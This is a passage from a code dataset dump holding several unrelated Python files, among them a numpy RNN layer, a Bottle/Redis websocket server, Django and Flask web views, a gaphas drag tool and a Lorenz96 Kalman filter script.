np.tile(self.h0, batch).reshape((batch, -1))\n\n outputs = self.forward(inputs)\n\n inputs = inputs.transpose((1, 0, 2))\n outputs = outputs.transpose((1, 0, 2))\n\n in_grads = in_grads.transpose((1, 0, 2))\n out_grads = np.empty(inputs.shape)\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n \n out_grads_s = np.zeros(in_grads.shape[1:3])\n for t in range(len(inputs)-1, -1, -1):\n out_grads_t = self.cell.backward(in_grads[t]+out_grads_s, [inputs[t], outputs[t-1] if t > 0 else h_0])\n self.kernel_grad += self.cell.kernel_grad\n self.r_kernel_grad += self.cell.r_kernel_grad\n self.b_grad += self.cell.b_grad\n (out_grads[t], out_grads_s) = out_grads_t\n\n return out_grads.transpose((1, 0, 2))\n\n def update(self, params):\n \"\"\"Update parameters with new params\n \"\"\"\n for k,v in params.items():\n if '/kernel' in k:\n self.kernel = v\n elif '/recurrent_kernel' in k:\n self.recurrent_kernel = v\n elif '/bias' in k:\n self.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/kernel': self.kernel,\n prefix+':'+self.name+'/recurrent_kernel': self.recurrent_kernel,\n prefix+':'+self.name+'/bias': self.bias\n }\n grads = {\n prefix+':'+self.name+'/kernel': self.kernel_grad,\n prefix+':'+self.name+'/recurrent_kernel': self.r_kernel_grad,\n prefix+':'+self.name+'/bias': self.b_grad\n }\n return params, grads\n else:\n return None \n\n\nclass BidirectionalRNN(Layer):\n \"\"\" Bi-directional RNN in Concatenating Mode\n \"\"\"\n def __init__(self, cell, h0=None, hr=None, name='brnn'):\n \"\"\"Initialize two inner RNNs for forward and backward processes, respectively\n\n # Arguments\n cell: instance of RNN Cell(D, H) for initializing the two RNNs\n h0: default initial state for forward phase, numpy array with shape (units,)\n hr: default initial state for backward phase, numpy array with shape (units,)\n \"\"\"\n super(BidirectionalRNN, self).__init__(name=name)\n self.trainable = True\n self.forward_rnn = RNN(cell, h0, 'forward_rnn')\n self.backward_rnn = RNN(copy.deepcopy(cell), hr, 'backward_rnn')\n\n def _reverse_temporal_data(self, x, mask):\n \"\"\" Reverse a batch of sequence data\n\n # Arguments\n x: a numpy array of shape (batch, time_steps, units), e.g.\n [[x_0_0, x_0_1, ..., x_0_k1, Unknown],\n ...\n [x_n_0, x_n_1, ..., x_n_k2, Unknown, Unknown]] (x_i_j is a vector of dimension of D)\n mask: a numpy array of shape (batch, time_steps), indicating the valid values, e.g.\n [[1, 1, ..., 1, 0],\n ...\n [1, 1, ..., 1, 0, 0]]\n\n # Returns\n reversed_x: numpy array with shape (batch, time_steps, units)\n \"\"\"\n num_nan = np.sum(~mask, axis=1)\n reversed_x = np.array(x[:, ::-1, :])\n for i in range(num_nan.size):\n reversed_x[i] = np.roll(reversed_x[i], x.shape[1]-num_nan[i], axis=0)\n return reversed_x\n\n def forward(self, inputs):\n \"\"\"\n Forward pass for concatenating hidden vectors obtained from the RNN \n processing on normal sentences and the RNN processing on reversed sentences.\n Outputs concatenate the two produced sequences.\n\n # Arguments\n inputs: input numpy array with shape (batch, time_steps, in_features), \n\n # Returns\n outputs: numpy array with shape (batch, time_steps, units*2)\n \"\"\"\n mask = ~np.any(np.isnan(inputs), axis=2)\n forward_outputs = self.forward_rnn.forward(inputs)\n backward_outputs = self.backward_rnn.forward(self._reverse_temporal_data(inputs, mask))\n outputs = np.concatenate([forward_outputs, self._reverse_temporal_data(backward_outputs, mask)], axis=2)\n return outputs\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, time_steps, units*2), gradients to outputs\n inputs: numpy array with shape (batch, time_steps, in_features), same with forward inputs\n\n # Returns\n out_grads: numpy array with shape (batch, time_steps, in_features), gradients to inputs\n \"\"\"\n mask = ~np.any(np.isnan(inputs), axis=2)\n in_grads_split = np.split(in_grads, 2, axis=2)\n forward_in_grads = in_grads_split[0]\n backward_in_grads = self._reverse_temporal_data(in_grads_split[1], mask)\n forward_out_grads = self.forward_rnn.backward(forward_in_grads, inputs)\n backward_out_grads = self.backward_rnn.backward(backward_in_grads, self._reverse_temporal_data(inputs, mask))\n return forward_out_grads + self._reverse_temporal_data(backward_out_grads, mask)\n\n def update(self, params):\n \"\"\"Update parameters with new params\n \"\"\"\n for k,v in params.items():\n if '/forward_kernel' in k:\n self.forward_rnn.kernel = v\n elif '/forward_recurrent_kernel' in k:\n self.forward_rnn.recurrent_kernel = v\n elif '/forward_bias' in k:\n self.forward_rnn.bias = v\n elif '/backward_kernel' in k:\n self.backward_rnn.kernel = v\n elif '/backward_recurrent_kernel' in k:\n self.backward_rnn.recurrent_kernel = v\n elif '/backward_bias' in k:\n self.backward_rnn.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/forward_kernel': self.forward_rnn.kernel,\n prefix+':'+self.name+'/forward_recurrent_kernel': self.forward_rnn.recurrent_kernel,\n prefix+':'+self.name+'/forward_bias': self.forward_rnn.bias,\n prefix+':'+self.name+'/backward_kernel': self.backward_rnn.kernel,\n prefix+':'+self.name+'/backward_recurrent_kernel': self.backward_rnn.recurrent_kernel,\n prefix+':'+self.name+'/backward_bias': self.backward_rnn.bias\n }\n grads = {\n prefix+':'+self.name+'/forward_kernel': self.forward_rnn.kernel_grad,\n prefix+':'+self.name+'/forward_recurrent_kernel': self.forward_rnn.r_kernel_grad,\n prefix+':'+self.name+'/forward_bias': self.forward_rnn.b_grad,\n prefix+':'+self.name+'/backward_kernel': self.backward_rnn.kernel_grad,\n prefix+':'+self.name+'/backward_recurrent_kernel': self.backward_rnn.r_kernel_grad,\n prefix+':'+self.name+'/backward_bias': self.backward_rnn.b_grad\n }\n return params, grads\n else:\n return None","sub_path":"rnn/rnn_layers.py","file_name":"rnn_layers.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"398314868","text":"__author__ = 'michael'\nfrom bottle import request, Bottle, abort\nimport redis\napp = Bottle()\n\nworker_thread = None\nweb_socket = None\nalready_subscribed = False\n\ndef handler(message):\n web_socket.send(message['data'])\n\ndef listener(channel_uniq, ws):\n\tr = redis.StrictRedis(host=\"localhost\", port=6379, db=0)\n\tchannel_listener = r.pubsub()\n\tchannel_name = 'monitor'\n\tglobal web_socket\n\tweb_socket = ws\n\tglobal worker_thread\n\tif not worker_thread and channel_uniq:\n\t\tchannel_listener.subscribe( **{channel_name: handler})\n\t\tthread = channel_listener.run_in_thread(sleep_time=0.001)\n\n\t\tworker_thread= thread\n\n@app.route('/conversation')\ndef handle_websocket():\n\twsock = request.environ.get('wsgi.websocket')\n\tif not wsock:\n\t\tabort(400, 'Expected WebSocket request.')\n\twhile True:\n\t\ttry:\n\t\t\tmessage = wsock.receive()\n\n\t\t\tlistener(message, wsock)\n\t\texcept WebSocketError:\n\t\t\tglobal worker_thread\n\t\t\tif worker_thread:\n\t\t\t\tworker_thread.stop()\n\t\t\tworker_thread = None\n\t\t\tbreak\n\nfrom gevent.pywsgi import WSGIServer\nfrom geventwebsocket import WebSocketError\nfrom geventwebsocket.handler import WebSocketHandler\n\nserver = WSGIServer((\"0.0.0.0\", 8090), app,handler_class=WebSocketHandler)\nserver.serve_forever()\n\n\n\n","sub_path":"noe/websocketserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"116215423","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nTable = [255,0,0]\n#Background = [255,255,255]\nUnlabelled = [0,0,0]\n\nDSET_MEAN = [0.41189489566336, 0.4251328133025, 0.4326707089857]\nDSET_STD = [0.27413549931506, 0.28506257482912, 0.28284674400252]\n\nlabel_colours = np.array([Table, Unlabelled])\n\n\ndef view_annotated(filename,tensor, plot=True):\n temp = tensor.numpy()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0,2):\n r[temp==l]=label_colours[l,0]\n g[temp==l]=label_colours[l,1]\n b[temp==l]=label_colours[l,2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:,:,0] = (r/255.0)#[:,:,0]\n rgb[:,:,1] = (g/255.0)#[:,:,1]\n rgb[:,:,2] = (b/255.0)#[:,:,2]\n if plot:\n plt.imshow(rgb)\n plt.show()\n else:\n plt.imsave(os.path.join('results',filename),rgb)\n print('Saved: ',filename)\n #return rgb\n\ndef decode_image(tensor):\n inp = tensor.numpy().transpose((1, 2, 0))\n mean = np.array(DSET_MEAN)\n std = np.array(DSET_STD)\n inp = std * inp + mean\n return inp\n\ndef view_image(tensor):\n inp = decode_image(tensor)\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n plt.show()\n","sub_path":"utils/imgs.py","file_name":"imgs.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"372918496","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport pandas as pd\n\ncolumn_order = ['geoid', 'name', 'state_fips', 'county_fips', 'tract_code',\n 'block_group_code', 'land_area', 'water_area', 'wkt']\n\ncounty = pd.read_csv(sys.argv[1])\n\ncounty.columns = county.columns.str.lower()\ncounty = county.drop(['countyns', 'geoid', 'name', 'lsad', 'classfp', 'mtfcc', 'csafp', 'cbsafp',\n 'metdivfp', 'funcstat', 'intptlat', 'intptlon', 'shape_length', 'shape_area'], axis=1)\n\ncounty.columns = ['wkt', 'state_fips', 'county_fips', 'name', 'land_area', 'water_area', 'geoid']\n\ncounty['tract_code'] = ''\ncounty['block_group_code'] = ''\n\ncounty = county[column_order]\n\ncounty['state_fips'] = county['state_fips'].astype(str).replace(re.compile('\\.0$'), '')\ncounty['state_fips'] = county['state_fips'].replace('nan', '')\ncounty['state_fips'] = county['state_fips'].str.pad(2, 'left', '0')\n\ncounty['county_fips'] = county['county_fips'].astype(str).replace(re.compile('\\.0$'), '')\ncounty['county_fips'] = county['county_fips'].replace('nan', '')\ncounty['county_fips'] = county['county_fips'].str.pad(3, 'left', '0')\n\ncounty.to_csv(sys.argv[2], index=False)\n\n","sub_path":"acs/bin/process_county_geo.py","file_name":"process_county_geo.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"505675154","text":"import logging\nfrom typing import Optional, Tuple, Union\n\nfrom gi.repository import Gdk, Gtk\nfrom typing_extensions import Protocol\n\nfrom gaphas.aspect import HandleMove, Move, item_at_point\nfrom gaphas.canvas import ancestors\nfrom gaphas.connector import Handle\nfrom gaphas.geometry import distance_point_point_fast\nfrom gaphas.item import Item\nfrom gaphas.types import Pos\nfrom gaphas.view import GtkView\n\nlog = logging.getLogger(__name__)\n\n\nclass MoveType(Protocol):\n def __init__(self, item: Item, view: GtkView):\n ...\n\n def start_move(self, pos: Pos) -> None:\n ...\n\n def move(self, pos: Pos) -> None:\n ...\n\n def stop_move(self, pos: Pos) -> None:\n ...\n\n\ndef item_tool(view: GtkView) -> Gtk.GestureDrag:\n \"\"\"Handle item movement and movement of handles.\"\"\"\n gesture = Gtk.GestureDrag.new(view)\n drag_state = DragState()\n gesture.connect(\"drag-begin\", on_drag_begin, drag_state)\n gesture.connect(\"drag-update\", on_drag_update, drag_state)\n gesture.connect(\"drag-end\", on_drag_end, drag_state)\n return gesture\n\n\nclass DragState:\n def __init__(self):\n self.moving = set()\n\n\ndef on_drag_begin(gesture, start_x, start_y, drag_state):\n view = gesture.get_widget()\n selection = view.selection\n event = gesture.get_last_event(None)\n modifiers = event.get_state()[1]\n item, handle = find_item_and_handle_at_point(view, (start_x, start_y))\n\n # Deselect all items unless CTRL or SHIFT is pressed\n # or the item is already selected.\n if not (\n modifiers & (Gdk.ModifierType.CONTROL_MASK | Gdk.ModifierType.SHIFT_MASK)\n or item in selection.selected_items\n ):\n selection.unselect_all()\n\n if not item:\n gesture.set_state(Gtk.EventSequenceState.DENIED)\n return\n\n if (\n not handle\n and item in selection.selected_items\n and modifiers & Gdk.ModifierType.CONTROL_MASK\n ):\n selection.unselect_item(item)\n gesture.set_state(Gtk.EventSequenceState.DENIED)\n return\n\n selection.focused_item = item\n gesture.set_state(Gtk.EventSequenceState.CLAIMED)\n\n if handle:\n drag_state.moving = {HandleMove(item, handle, view)}\n else:\n drag_state.moving = set(moving_items(view))\n\n for moving in drag_state.moving:\n moving.start_move((start_x, start_y))\n\n\ndef find_item_and_handle_at_point(\n view: GtkView, pos: Pos\n) -> Tuple[Optional[Item], Optional[Handle]]:\n item, handle = handle_at_point(view, pos)\n return item or item_at_point(view, pos), handle\n\n\ndef moving_items(view):\n \"\"\"Filter the items that should eventually be moved.\n\n Returns Move aspects for the items.\n \"\"\"\n selected_items = set(view.selection.selected_items)\n for item in selected_items:\n # Do not move subitems of selected items\n if not set(ancestors(view.model, item)).intersection(selected_items):\n yield Move(item, view)\n\n\ndef on_drag_update(gesture, offset_x, offset_y, drag_state):\n _, x, y = gesture.get_start_point()\n for moving in drag_state.moving:\n moving.move((x + offset_x, y + offset_y))\n\n\ndef on_drag_end(gesture, offset_x, offset_y, drag_state):\n _, x, y = gesture.get_start_point()\n for moving in drag_state.moving:\n moving.stop_move((x + offset_x, y + offset_y))\n drag_state.moving = set()\n\n\ndef handle_at_point(\n view: GtkView, pos: Pos, distance: int = 6\n) -> Union[Tuple[Item, Handle], Tuple[None, None]]:\n \"\"\"Look for a handle at ``pos`` and return the tuple (item, handle).\"\"\"\n\n def find(item):\n \"\"\"Find item's handle at pos.\"\"\"\n v2i = view.get_matrix_v2i(item)\n d = distance_point_point_fast(v2i.transform_distance(0, distance))\n x, y = v2i.transform_point(*pos)\n\n for h in item.handles():\n if not h.movable:\n continue\n hx, hy = h.pos\n if -d < (hx - x) < d and -d < (hy - y) < d:\n return h\n\n selection = view.selection\n\n # The focused item is the preferred item for handle grabbing\n if selection.focused_item:\n h = find(selection.focused_item)\n if h:\n return selection.focused_item, h\n\n # then try hovered item\n if selection.hovered_item:\n h = find(selection.hovered_item)\n if h:\n return selection.hovered_item, h\n\n # Last try all items, checking the bounding box first\n x, y = pos\n items = reversed(\n list(\n view.get_items_in_rectangle(\n (x - distance, y - distance, distance * 2, distance * 2)\n )\n )\n )\n\n for item in items:\n h = find(item)\n if h:\n return item, h\n return None, None\n","sub_path":"gaphas/tool/itemtool.py","file_name":"itemtool.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"311820999","text":"# -*- coding: utf-8 -*-\nfrom admintool.nc.models import Tree_bulk_edit, Type, ATTR\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom generic import GenericRequired\nfrom django.conf import settings\n\n\nclass BulkRequired(GenericRequired):\n\n def node(self):\n success = False\n \n if self.params().has_key('attr_schema'):\n schema = self.params()['attr_schema']\n \n if 'node' in getattr(self.request, self._method):\n node = getattr(self.request, self._method)['node']\n \n if \"/%s\" % node == settings.OT_ROOT or node == settings.OT_ROOT:\n try:\n Tree_bulk_edit.objects.filter(parent=None, attr_schema=schema)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Ошибка в таблице Tree_bulk_edit => нет OT с parent=None\")\n else:\n success = True \n self._params['node'] = None\n return True\n else:\n try:\n node = int(node)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n self._reasons.append(u\"Узел дерева[Bulk Edit] не число: %s\" % node)\n else: \n try:\n node = Tree_bulk_edit.objects.get(id=node)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Узел дерева[Bulk Edit] не найден по ID: %s\" % node)\n else:\n success = True\n self._params['node'] = node\n return True \n else:\n self._reasons.append(u\"ID узла дерева[Bulk Edit] обязательным параметром\")\n \n def attrs(self):\n success = False\n self._params['attrs'] = []\n\n if 'attrs' in getattr(self.request, self._method):\n attrs = getattr(self.request, self._method).getlist('attrs')\n \n for attr in attrs:\n try:\n attr = int(attr)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n self._reasons.append(u\"ID атрибута не число: %s\" % attr)\n else: \n try:\n attr = Tree_bulk_edit.objects.get(id=attr, type='attr')\n except ObjectDoesNotExist:\n self._reasons.append(u\"Bulk Edit атрибут не найден в таблице Tree_bulk_edit по ID: %s\" % attr)\n else:\n try:\n attr = ATTR.objects.get(id=attr.orig_id)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Атрибут не найден по bulk_edit ORIG_ID: %s\" % attr.orig_id)\n else:\n success = True\n self._params['attrs'].append(attr)\n else:\n self._reasons.append(u\"Список ID атрибутов является обязательным параметром\")\n \n return success\n \n def name(self):\n success = True\n \n if 'name' in getattr(self.request, self._method):\n name = getattr(self.request, self._method)['name']\n \n if name.lstrip().rstrip() == '':\n success = False\n self._reasons.append(u\"Имя не должно быть пустым\")\n else:\n self._params['name'] = name\n else:\n self._params['name'] = None\n \n return success\n\n def description(self):\n success = True\n \n if 'description' in getattr(self.request, self._method):\n description = getattr(self.request, self._method)['description']\n \n self._params['description'] = description\n else:\n self._params['description'] = None\n \n return success\n\n def type(self):\n success = True\n \n if 'type' in getattr(self.request, self._method):\n type = getattr(self.request, self._method)['type']\n\n try:\n type = int(type)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n self._reasons.append(u\"тип атрибута не число: %s\" % node)\n else: \n try:\n type = Type.objects.get(id=type)\n except ObjectDoesNotExist:\n success = False\n self._reasons.append(u\"Атрибутный тип не найден по ID: %s\" % type)\n else:\n self._params['type'] = type\n else:\n self._params['type'] = None\n \n return success\n\n def def_value(self):\n success = True\n \n if 'def_value' in getattr(self.request, self._method):\n def_value = getattr(self.request, self._method)['def_value']\n \n self._params['def_value'] = def_value\n else:\n self._params['def_value'] = None\n\n return success\n \n def mask(self):\n success = True\n \n if 'mask' in getattr(self.request, self._method):\n mask = getattr(self.request, self._method)['mask']\n \n self._params['mask'] = mask\n else:\n self._params['mask'] = None\n\n return success\n \n def displayed(self):\n success = True\n \n if 'displayed' in getattr(self.request, self._method):\n displayed = getattr(self.request, self._method)['displayed']\n \n if displayed.upper() in ('TRUE', 'FALSE'):\n if displayed.upper() == 'FALSE':\n self._params['displayed'] = False\n \n if displayed.upper() == 'TRUE':\n self._params['displayed'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Displayed = 'True' or 'False'. Пришло: %s\" % displayed)\n else:\n self._params['displayed'] = None\n\n return success\n\n def multiple(self):\n success = True\n \n if 'multiple' in getattr(self.request, self._method):\n multiple = getattr(self.request, self._method)['multiple']\n \n if multiple.upper() in ('TRUE', 'FALSE'):\n if multiple.upper() == 'FALSE':\n self._params['multiple'] = False\n \n if multiple.upper() == 'TRUE':\n self._params['multiple'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Multiple = 'True' or 'False'. Пришло: %s\" % multiple)\n else:\n self._params['multiple'] = None\n\n return success\n \n def read_only(self):\n success = True\n \n if 'read_only' in getattr(self.request, self._method):\n read_only = getattr(self.request, self._method)['read_only']\n \n if read_only.upper() in ('TRUE', 'FALSE'):\n if read_only.upper() == 'FALSE':\n self._params['read_only'] = False\n \n if read_only.upper() == 'TRUE':\n self._params['read_only'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Read Only = 'True' or 'False'. Пришло: %s\" % read_only)\n else:\n self._params['read_only'] = None \n\n return success\n \n def hidden(self):\n success = True\n \n if 'hidden' in getattr(self.request, self._method):\n hidden = getattr(self.request, self._method)['hidden']\n \n if hidden.upper() in ('TRUE', 'FALSE'):\n if hidden.upper() == 'FALSE':\n self._params['hidden'] = False\n \n if hidden.upper() == 'TRUE':\n self._params['hidden'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Hidden = 'True' or 'False'. Пришло: %s\" % hidden)\n else:\n self._params['hidden'] = None \n\n return success\n \n def required(self):\n success = True\n \n if 'required' in getattr(self.request, self._method):\n required = getattr(self.request, self._method)['required']\n \n if required.upper() in ('TRUE', 'FALSE'):\n if required.upper() == 'FALSE':\n self._params['required'] = False\n \n if required.upper() == 'TRUE':\n self._params['required'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Required = 'True' or 'False'. Пришло: %s\" % required)\n else:\n self._params['required'] = None \n\n return success\n \n def calculable(self):\n success = True\n \n if 'calculable' in getattr(self.request, self._method):\n calculable = getattr(self.request, self._method)['calculable']\n \n if calculable.upper() in ('TRUE', 'FALSE'):\n if calculable.upper() == 'FALSE':\n self._params['calculable'] = False\n \n if calculable.upper() == 'TRUE':\n self._params['calculable'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Calculable = 'True' or 'False'. Пришло: %s\" % calculable)\n else:\n self._params['calculable'] = None\n \n return success ","sub_path":"nc/lib/required/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":10627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"277694396","text":"from django.shortcuts import render, redirect\n\nfrom .models import Route\n\n\n\"\"\" def createSchedule(request):\n schedule_form = ScheduleForm() \"\"\"\n'''\ndef create_class_model_form(request):\n template_name = 'cav_map/coordinateInputs.html'\n #heading_message = 'Model Formset Demo'\n if request.method == 'GET':\n # we don't want to display the already saved model instances\n formset = ClassFormset(queryset=Class.objects.none())\n elif request.method == 'POST':\n formset = ClassFormset(request.POST)\n if formset.is_valid():\n for form in formset:\n # only save if name is present\n if form.cleaned_data.get('className'):\n form.save()\n return redirect('1/multiPath')\n return render(request, template_name, {\n 'formset': formset,\n })\n'''\n\n'''def classInfo(request):\n i = 0\n #if request.method == 'POST':\n class_form = ClassForm(request.POST)\n classes_form = [6]\n \n if class_form.is_valid():\n \n new_class = class_form.save()\n print(class_form)\n print(new_class.className, new_class.building)\n #classes_form[i] = new_class\n i + 1\n\n #new_class.student = request.user #set student to user logged in\n #new_class.save()\n #class_form.save()\n return redirect('1/multiPath')\n #else:\n # class_form = ClassForm()\n \n context = {\n \n }\n return render(request, 'cav_map/coordinateInputs.html', {'form' : class_form})\n\n#def scheduleInfo(request):\n\n #schedule_form = \n'''\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom django.views import generic\nfrom .models import ForumPost, ForumPostForm\nfrom django.http import HttpResponseRedirect\nimport datetime\nfrom pytz import timezone\nimport json\n\n\ndef forum_post_create_view(request):\n if request.method == 'POST':\n form = ForumPostForm(request.POST)\n if form.is_valid():\n f = ForumPost()\n f.title_field = form.cleaned_data['title_field']\n f.author = request.user\n f.pub_date = datetime.datetime.utcnow()-datetime.timedelta(hours=4)\n f.post = form.cleaned_data['post']\n f.save()\n return HttpResponseRedirect('/forum/')\n else:\n form = ForumPostForm()\n context = {'form': form}\n return render(request, \"cav_map/createPost.html\", context)\n\ndef create_class(request):\n template = 'cav_map/multiPath.html'\n if request.method == 'POST':\n request_getdata = request.POST.get(\"urls\", \"None\")\n lst = json.loads(request_getdata)\n entry = Route.objects.filter(user=request.user).first()\n if entry:\n r = Route.objects.get(user=request.user)\n else:\n r = Route()\n r.user = request.user\n r.urls = lst\n #new_class = Class.objects.get()\n r.save()\n return render(request, template)\ndef create_class2(request):\n entry = Route.objects.filter(user=request.user).first()\n if entry:\n context = {'urls': json.dumps(Route.objects.get(user=request.user).urls)}\n else:\n url = '/routemaker/'\n resp_body = '' % url\n return HttpResponse(resp_body)\n template = 'cav_map/savedMP.html'\n return render(request, template, context)\nclass forumPostView(generic.ListView):\n context_object_name = 'ps'\n template_name = 'cav_map/forum.html'\n def get_queryset(self):\n return ForumPost.objects.all().order_by('-pub_date')\n","sub_path":"cav_map/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251891768","text":"from flask import Flask, request, render_template, redirect\n\nimport hackbright\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef directory_homepage():\n \"\"\"Show directory of all students and all projects\"\"\"\n\n student_list = hackbright.get_student_body()\n project_list = hackbright.get_all_projects()\n\n return render_template(\"homepage.html\",\n students=student_list,\n projects=project_list)\n\n@app.route(\"/student\")\ndef get_student():\n \"\"\"Show information about a student.\"\"\"\n\n github = request.args.get('github','jhacks')\n first, last, github = hackbright.get_student_by_github(github)\n project_information = hackbright.get_grades_by_github(github)\n # return \"%s is the GitHub account for %s %s\" % (github, first, last)\n return render_template(\"student_info.html\",\n github=github, \n first=first, \n last=last,\n project_information=project_information)\n\n@app.route(\"/student-search\")\ndef get_student_form():\n \"\"\"Show form for searching for a student\"\"\"\n\n return render_template(\"student_search.html\")\n\n\n@app.route(\"/student-add\")\ndef student_add():\n \"\"\"Add a student.\"\"\"\n\n return render_template(\"new_student.html\")\n\n\n@app.route(\"/add-to-database\", methods=['POST'])\ndef add_database():\n \"\"\"Add a student.\"\"\"\n\n github_input = request.form.get('github')\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n\n hackbright.make_new_student(first_name,last_name,github_input)\n\n return redirect(\"/student-search\")\n\n\n\n@app.route(\"/project\")\ndef describe_project():\n \"\"\"Gives title, description, and maximum grade of a project\"\"\"\n\n title = request.args.get('name')\n project_info = hackbright.get_project_by_title(title)\n project_title, description, max_grade = project_info\n\n project_grades = hackbright.get_grades_by_title(title)\n \n\n\n return render_template(\"/projects.html\", \n project_title=project_title, \n description=description,\n max_grade=max_grade,\n grades=project_grades)\n\n\nif __name__ == \"__main__\":\n hackbright.connect_to_db(app)\n app.run(debug=True)\n","sub_path":"hackbright-web.py","file_name":"hackbright-web.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"505506978","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 21:15:17 2016\n\n@author: seis\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom function import Lorenz96, RungeKutta4, KF\nimport sys\n\n#各定数の定義を行う\nT = 0\ndt = 0.05\nF = 8.\nJ = 40\n\nR = np.eye(J)\nP_a = R*10\nP_a = R\nH = np.eye(J)\n\n#データの読み込みを行っている。data[i]がiステップ目の40個のベクトルデータになっている。data1が真値data2が観測値\ndata1 = np.loadtxt(\"data01.txt\", delimiter=\", \")\ndata2 = np.loadtxt(\"data02.txt\", delimiter=\", \")\n\n#カルマンフィルターを適用した場合\nFig1 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nx_a = data2[0]\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a, P_a = KF(x_a, x_f, y, dt, P_a, H, R)\n Fig1.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n#sys.exit()\n\n#最初に観測値だけを代入してその後は観測値を全く使わずに計算した場合\nFig2 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = x_f.copy()\n Fig2.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J)) \n\n#毎回観測値を代入して計算した場合\nFig3 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, y, F, dt)\n y = data2[i]\n x_a = x_f.copy()\n Fig3.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n\n#毎回観測値と予測値を1/2ずつ足しあわせたものを解析値とした場合\nFig4 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = (x_f + y)/2\n Fig4.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n \n#その他の場合\nFig5 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = (x_f*5 + y)/6\n Fig5.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig1)\n#plt.title(\"case 3\")\n#plt.savefig(\"Fig4.png\",format = 'png', dpi=300)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig2)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig3)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 